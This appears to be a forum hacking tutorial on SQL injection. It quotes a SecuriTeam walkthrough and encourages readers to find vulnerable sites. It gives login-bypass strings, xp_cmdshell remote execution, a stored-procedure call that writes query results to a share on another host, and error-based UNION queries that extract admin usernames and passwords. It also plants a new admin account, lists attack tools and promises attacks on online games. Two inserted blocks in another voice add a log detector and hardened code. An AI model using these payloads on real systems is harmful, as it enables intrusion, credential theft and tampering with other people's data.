To carry out an SQL injection successfully, you need to know the SQL language first.

 

SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.

 

I'm going to show you two of the guides that I read when I started in the world of SQL.

 

When a server only has the web port (usually 80 or 8080) open, and the server is relatively secure, a possible intruder must turn to hacking. One simple method against an SQL-equipped server (used for many database-driven web apps, such as forums or login screens) is a technique called "SQL injection", meaning you are able to "inject" code into the SQL server. For you techies: the application takes parameters from the user and makes an SQL query to a database.

 

This means you need to find an input, like a login screen. Look for pages that use ASP, JSP, CGI, or PHP, and for URLs that carry parameters, like

 

http://hackerblog.com/index.asp?id=13

 

or similar. Now that you have found the page, test whether it is vulnerable. Start off with some simple parameters, like

 

1=1--

 

or, alternatively,

 

test'

 

Type those into one of the inputs, or even into the URL itself, e.g.

 

http://hackerblog.com/index.asp?id=test'

 

or

 

http://hackerblog.com/index.asp?id=1=1--

 

If the field is hidden, you can still download the page source, find the hidden field, fill it in as above, then save it as an HTML file and open it. If you can't do that, you probably shouldn't be reading this! E.g.

 

 

 

 

 

There ya go. If it works, you will be able to log in without any password, etcetera. If so, lucky you! We use -- because it tells the server to ignore the rest of the query (the part that would check the password), so the condition matches the entire table and you get logged in, since it looks like you are logging in as everybody. That's the best I can explain it; figure out the "why's" for yourselves if you want. Now if that doesn't work, there are several other options:

 

" or "a"="a

') or ('a'='a

' or 1=1--

" or 1=1--

or 1=1--

' or 'a'='a

 

The next bit I quote from SecuriTeam (http://securiteam.com):

 

"Being able to inject SQL commands usually means we can execute any SQL query at will. The default installation of MS SQL Server runs as SYSTEM, which is equivalent to Administrator access in Windows. We can use stored procedures like master..xp_cmdshell to perform remote execution:

 

'; exec master..xp_cmdshell 'ping 10.10.1.2'--

 

Try using a double quote (") if the single quote (') is not working.

 

The semicolon will end the current SQL query and thus allow you to start a new SQL command. To verify that the command executed successfully, you can listen for ICMP packets from 10.10.1.2 and check if there is any packet from the server:

 

#tcpdump icmp

 

If you do not get any ping request from the server, and get an error message indicating a permission error, it is possible that the administrator has limited the Web User's access to these stored procedures.

 

It is possible to use sp_makewebtask to write your query into an HTML file:

 

'; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"

 

But the target IP must have the folder "share" shared for Everyone.

 

We can use information from error messages produced by MS SQL Server to get almost any data we want. Take the following page for example:

 

http://duck/index.asp?id=10

 

We will try to UNION the integer '10' with another string from the database:

 

http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

 

The system table INFORMATION_SCHEMA.TABLES contains information about all tables on the server. The TABLE_NAME field obviously contains the name of each table in the database. It was chosen because we know it always exists. Our query:

 

SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

 

This should return the first table name in the database. When we UNION this string value with the integer 10, MS SQL Server will try to convert the string (nvarchar) to an integer. This will produce an error, since nvarchar cannot be converted to int. The server will display the following error:

 

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver]

Syntax error converting the nvarchar value 'table1' to a column of data type int.

/index.asp, line 5

 

The error message is nice enough to tell us the value that cannot be converted into an integer. In this case, we have obtained the first table name in the database, which is "table1".

 

To get the next table name, we can use the following query:

 

http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('table1')--

 

We can also search for data using the LIKE keyword:

 

http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25login%25'--

 

Output:

 

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin_login' to a column of data type int.

/index.asp, line 5

 

The matching pattern '%25login%25' will be seen as %login% by SQL Server. In this case, we will get the first table name that matches the criteria, "admin_login".

 

We can use another useful table, INFORMATION_SCHEMA.COLUMNS, to map out all the column names of a table:

 

http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'--

 

Output:

 

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_id' to a column of data type int.

/index.asp, line 5

 

Now that we have the first column name, we can use NOT IN () to get the next column name:

 

http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' AND COLUMN_NAME NOT IN ('login_id')--

 

Output:

 

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_name' to a column of data type int.

/index.asp, line 5

 

When we continue further, we obtain the rest of the column names, i.e. "password" and "details". We know we have them all when we get the following error message:

 

http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' AND COLUMN_NAME NOT IN ('login_id','login_name','password','details')--

 

Output:

 

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]ORDER BY items must appear in the select list if the statement contains a UNION operator.

/index.asp, line 5

 

Now that we have identified some important tables and their columns, we can use the same technique to gather any information we want from the database.

 

Now, let's get the first login_name from the "admin_login" table:

 

http://duck/index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login--

 

Output:

 

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'neo' to a column of data type int.

/index.asp, line 5

 

We now know there is an admin user with the login name of "neo". Finally, to get the password of "neo" from the database:

 

http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='neo'--

 

Output:

 

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'm4trix' to a column of data type int.

/index.asp, line 5

 

We can now login as "neo" with his password "m4trix".

 

There is a limitation with the technique described above. We cannot get any error message if we are trying to convert text that consists of a valid number (characters 0-9 only). Let's say we are trying to get the password of "trinity", which is "31173":

 

http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='trinity'--

 

We will probably get a "Page Not Found" error. The reason is that the password "31173" will be converted into a number before the UNION with the integer (10 in this case). Since it is a valid UNION statement, SQL Server will not throw an ODBC error message, and thus we will not be able to retrieve any numeric entry.

 

To solve this problem, we can append some letters to the numeric string to make sure the conversion fails. Let us try this query instead:

 

http://duck/index.asp?id=10 UNION SELECT TOP 1 convert(int, password%2b'%20morpheus') FROM admin_login where login_name='trinity'--

 

We simply use a plus sign (+) to append any text we want to the password (the ASCII code for '+' is 0x2b). We will append '(space)morpheus' to the actual password. Therefore, even if we have the numeric string '31173', it will become '31173 morpheus'. By manually calling the convert() function to convert '31173 morpheus' into an integer, SQL Server will throw out an ODBC error message:

 

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '31173 morpheus' to a column of data type int.

/index.asp, line 5

 

Now, you can even login as 'trinity' with the password '31173'."

 

Alright. Now that SecuriTeam has explained how to snag some data from the server, we will go on to insert data into it.

 

To insert data, use INSERT INTO, e.g.

 

http://duck/index.asp?id=10; INSERT INTO admin_login (login_id, login_name, password, details) VALUES (666,'neo2','newpas5','NA')--

 

We can now login as "neo2" with the password of "newpas5".
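The payloads above all leave a recognisable trace in the web server's access log (URL-encoded, as the %25 and %2b forms in the guide show). As an added example, not part of the guide or of SecuriTeam's text, here is a small Python detector run over a few constructed log lines in a simplified "ip method path query status" format; the rule names, the sample lines and the format are all my own assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample log (not real traffic): "client-ip method path query status".
# The queries are the URL-encoded forms of the payloads the guide walks through.
SAMPLE_LOG = """\
10.0.0.5 GET /index.asp id=10 200
10.0.0.7 GET /index.asp id=10%20UNION%20SELECT%20TOP%201%20TABLE_NAME%20FROM%20INFORMATION_SCHEMA.TABLES-- 500
10.0.0.7 GET /index.asp id=10%20UNION%20SELECT%20TOP%201%20convert(int,%20password%2b'%20morpheus')%20FROM%20admin_login-- 500
10.0.0.9 GET /login.asp user=test' 500
10.0.0.7 GET /index.asp id=10;%20INSERT%20INTO%20admin_login%20VALUES%20(666,'neo2','newpas5','NA')-- 200
10.0.0.3 GET /index.asp id=42 200
"""

# Each rule is applied to the URL-decoded query string. The last one is noisy
# (a legitimate O'Brien would trip it), so treat it as a weak signal on its own.
RULES = [
    ("union-select", re.compile(r"\bunion\b.*\bselect\b", re.I)),
    ("schema-probe", re.compile(r"information_schema\.(tables|columns)", re.I)),
    ("stacked-query", re.compile(r";\s*(insert|exec|update|delete|drop)\b", re.I)),
    ("xp-procedure", re.compile(r"\b(xp_cmdshell|sp_makewebtask)\b", re.I)),
    ("type-cast-probe", re.compile(r"\bconvert\s*\(\s*int\b", re.I)),
    ("quote-comment", re.compile(r"'.*--|'\s*$", re.S)),
]

def decode_query(query):
    # Decode twice: '%2b' -> '+' on the first pass, and '%25login%25' -> '%login%'
    # only reads as a LIKE pattern once the percent signs are restored.
    return unquote(unquote(query))

def scan_line(line):
    """Return (client_ip, [matched rule names]) for one log line, or None if clean."""
    parts = line.split()
    if len(parts) < 5:
        return None
    ip, query = parts[0], decode_query(parts[3])
    hits = [name for name, rx in RULES if rx.search(query)]
    return (ip, hits) if hits else None

def scan_log(text):
    """Scan a whole log; returns one tuple per suspicious line, in file order."""
    return [hit for hit in (scan_line(line) for line in text.splitlines()) if hit]

if __name__ == "__main__":
    for ip, hits in scan_log(SAMPLE_LOG):
        print(ip, ", ".join(hits))
```

Correlating the hits with the 500 status codes is what turns the error-based enumeration into a clear pattern: one client, many failed UNION requests in a row.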

 

Another quote from SecuriTeam on how to prevent it from happening to you:

 

"Filter out characters like single quote, double quote, slash, backslash, semicolon, and extended characters like NULL, carriage return, new line, etc., in all strings from:

- Input from users

- Parameters from URL

- Values from cookie

 

For numeric values, convert them to an integer before putting them into the SQL statement, or use ISNUMERIC to make sure they are integers.

 

Change "Startup and run SQL Server" to use a low-privilege user in the SQL Server Security tab.

 

Delete stored procedures that you are not using, like:

 

master..Xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask"

 

To hackers: remember, it's something completely preventable by good coding practice, and it is usually only possible when the developer is being lazy or sloppy.
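To make the prevention advice concrete, here is an added example (my own code, not from the guide or SecuriTeam) showing the vulnerable string-concatenation pattern next to its hardened form: parameter binding for strings, and integer conversion for numeric parameters, as SecuriTeam recommends. It uses an in-memory sqlite3 database standing in for MS SQL Server; the table contents are constructed from the guide's admin_login example.

```python
import sqlite3

def make_db():
    # Constructed in-memory database modelled on the guide's admin_login table
    # (sqlite3 stands in for MS SQL Server; the binding principle is the same).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin_login (login_id INTEGER, login_name TEXT, password TEXT, details TEXT)")
    conn.execute("INSERT INTO admin_login VALUES (1, 'neo', 'm4trix', 'NA')")
    conn.execute("CREATE TABLE items (id INTEGER, name TEXT)")
    conn.execute("INSERT INTO items VALUES (10, 'widget')")
    return conn

def login_vulnerable(conn, user, pwd):
    # String concatenation: the quote and -- characters the guide lists become SQL,
    # so the password check can be commented out of the WHERE clause.
    sql = "SELECT login_name FROM admin_login WHERE login_name='%s' AND password='%s'" % (user, pwd)
    return conn.execute(sql).fetchone()

def login_safe(conn, user, pwd):
    # Parameter binding: values travel separately from the statement text,
    # so a quote in the input is only a character inside the value.
    sql = "SELECT login_name FROM admin_login WHERE login_name=? AND password=?"
    return conn.execute(sql, (user, pwd)).fetchone()

def item_vulnerable(conn, raw_id):
    # Numeric parameter pasted into the statement: a UNION rides in unquoted.
    return conn.execute("SELECT name FROM items WHERE id=" + raw_id).fetchall()

def item_safe(conn, raw_id):
    # SecuriTeam's advice for numeric values: convert to an integer first.
    # int() raises ValueError on anything that is not a plain number, and the
    # bound parameter could not be parsed as SQL even if it got through.
    return conn.execute("SELECT name FROM items WHERE id=?", (int(raw_id),)).fetchall()

def safe_lookup_rejects(conn, raw_id):
    """True if the hardened lookup refuses the input instead of running it."""
    try:
        item_safe(conn, raw_id)
    except ValueError:
        return True
    return False
```

Note that the hardened versions do not filter characters at all; binding and type conversion remove the need for the blacklist in the first bullet of the quote, which is easy to get wrong.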

 

 

Here ends the 1st guide; credits go to ChrisTek.

 

I will link the second one (I don't want to make a double post):

 

http://unixwiz.net/techtips/sql-injection.html

 

 

After all this you must be asking: well, sure, I have all this info, but I will need programs ¬¬

 

Yes, but I don't know if I can share them, so I will just name a few (you will have to search for them, don't be lazy):

 

-Absinthe

   * Automated SQL Injection

   * Supports MS SQL Server, MSDE, Oracle, Postgres

   * Cookies / Additional HTTP Headers

   * Query Termination

   * Additional text appended to queries

   * Supports Use of Proxies / Proxy Rotation

   * Multiple filters for page profiling

   * Custom Delimiters

 

 

-SQLI

It takes a URL and tries to determine by itself all the information necessary to exploit the SQL injection vulnerability, without requiring intervention from the user.

 

-SQLBrute

SQLBrute is a tool for brute forcing data out of databases through blind SQL injection. It uses time-based and error-based techniques on Microsoft SQL Server and Oracle. It is written in Python.

 

-Bobcat

Bobcat is a tool that helps security auditors get the most out of SQL injection vulnerabilities. It is based on AppSecInc research. It can list linked servers and the database schema, and allows data retrieval from any table that the injected query has access to.

 

-SqlMap

sqlmap is an automatic blind SQL injection tool, developed in Python, able to fingerprint the database, enumerate a list of all the remote databases, and more.

 

Just naming a few that I use =P

 

I will give some examples of SQL injections on games like MU and L2 (give me some time to write something ^^)

 

Hope this guide helps anyone.

 
